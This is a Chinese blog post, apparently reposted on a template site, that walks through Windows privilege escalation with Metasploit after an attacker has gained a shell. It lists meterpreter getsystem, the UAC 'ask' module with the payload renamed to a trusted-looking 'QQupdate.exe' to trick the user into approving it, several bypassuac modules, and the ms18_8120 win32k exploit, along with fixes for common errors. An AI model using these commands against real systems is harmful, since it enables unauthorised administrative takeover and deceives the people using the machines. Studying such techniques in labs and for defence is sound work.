我的内网渗透-提权大法-Toy模板网

这篇具有很好参考价值的文章主要介绍了我的内网渗透-提权大法。希望对大家有所帮助。如果存在错误或未考虑完全的地方，请大家不吝赐教，您也可以点击"举报违法"按钮提交疑问。

拿到shell之后乱码解决

chcp 65001
#将编码设置为UTF-8的编码

出现这个提示就是切换成功，后面也是可以正常显示的

我的内网渗透-提权大法

提权

方法一：

新版本的kali直接getsystem，可以提权成功（有时候可以，有时候不可以）

meterpreter > getsystem

提权成功

我的内网渗透-提权大法

方法二：

利用uac（用户账户控制）进行提权。

用户账户控制在涉及管理员权限的时候会提示你是否要这么做，确定的话就是以管理员的身份去运行；如果把他拉到从不通知，在涉及需要使用管理员权限的时候就会直接以管理员的身份去运行。

我的内网渗透-提权大法

利用uac提权有两种情况

①关闭了通知。在这种情况下，就不需要目标主机进行确认，可以直接提权成功

②开启着通知（默认是开启的，除非手动关闭）。这种情况就需要目标主机去确认，才能进行提权成功。

use exploit/windows/local/ask 
#使用windows的ask模块进行提权
search uac
#或者直接搜寻uac模块，找到ask也可以

msf6 exploit(windows/local/ask) > options
#进入模块后直接options查看需要进行哪一些配置

msf6 exploit(windows/local/ask) > set session 1
#设置我们要进行提权的会话

msf6 exploit(windows/local/ask) > set lport 5555
#这边的端口设置是随意的，不用跟session 1的端口一致


msf6 exploit(windows/local/ask) > set filename QQupdate.exe
#设置在目标主机uac弹出的名字，可以更改成一些比较可信的名称
#这里有一个要特别注意的点是需要在修改的文件名后面加上exe，不然在kali中攻击过程没显示报错，但是在目标主机中是弹不出uac窗口的

unset filename（或者其他配置名字）
#进行设置重置

msf6 exploit(windows/local/ask) > set technique PSH
#将设置成windows处理程序，可信度更高（原本是exe）

meterpreter > getsystem
#在目标主机确认之后会重新进入meterpreter模块，然后就可以获取计算机的管理权限

提权所生成的文件在目标主机的 C:\Users\ADMINI~1\AppData\Local\Temp

我的内网渗透-提权大法

方法三：

利用bypassuac进行提权。

bypassuac这个是属于内核漏洞，有打补丁的话是不一定能成功的。

这些模块不一定每一个都可以使用，有一些是你系统不存在漏洞，有一些是你系统打了补丁

我的内网渗透-提权大法

search bypassuac
#寻找可以绕过uac的脚本模块

msf6 exploit(windows/local/bypassuac_eventvwr) > use 0
#选择使用的模块，或者直接跟上模块的名称

msf6 exploit(windows/local/bypassuac_windows_store_filesys) > options
#查看一下使用模块的配置，一般只需要设置会话

msf6 exploit(windows/local/bypassuac_windows_store_filesys) > set session 1
#设置要进行提权的会话

msf6 exploit(windows/local/bypassuac_windows_store_filesys) > run
#直接运行等待结果

报错

1. payload的设置。

[-] Exploit aborted due to failure: bad-config: The payload should use the same architecture as the target。

如果存在这样的问题，那么就需要更改下payload，需要和你之前会话的payload配置保持相同。

2.[-] Exploit aborted due to failure: no-target: Session and Target arch must match
如果存在这样的报错就是存在windows的位数问题，他后面显示是X86的，我们之前用的是x64的payload。
在用msfvenom生成木马的时候可以不加x64进行木马生成，默认就是生成32位的程序。这样子就不会存在这种报错，不过这样子生成的程序容易存在兼容性问题，在主机中可能会直接进行提示兼容性问题，或者停止程序的运行

Exploit target:

   Id Name
   -- ----
   0   Windows x86

方法四：

此方法适用于攻击服务器，windows主机很难实现文章来源地址https://www.toymoban.com/news/detail-481002.html

msf6 exploit(windows/local/bypassuac_eventvwr) > search ms18_8120_win
#查找漏洞

msf6 exploit(windows/local/ms18_8120_win32k_privesc) > options
#查看一下要进行设置的配置

msf6 exploit(windows/local/ms18_8120_win32k_privesc) > set session 1
#设置要使用的会话

msf6 exploit(windows/local/ms18_8120_win32k_privesc) > run
#开始攻击

run -j 
#后台运行

jobs
#查看监听（是否建立了会话）

到了这里，关于我的内网渗透-提权大法的文章就介绍完了。如果您还想了解更多内容，请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章，希望大家以后多多支持TOY模板网！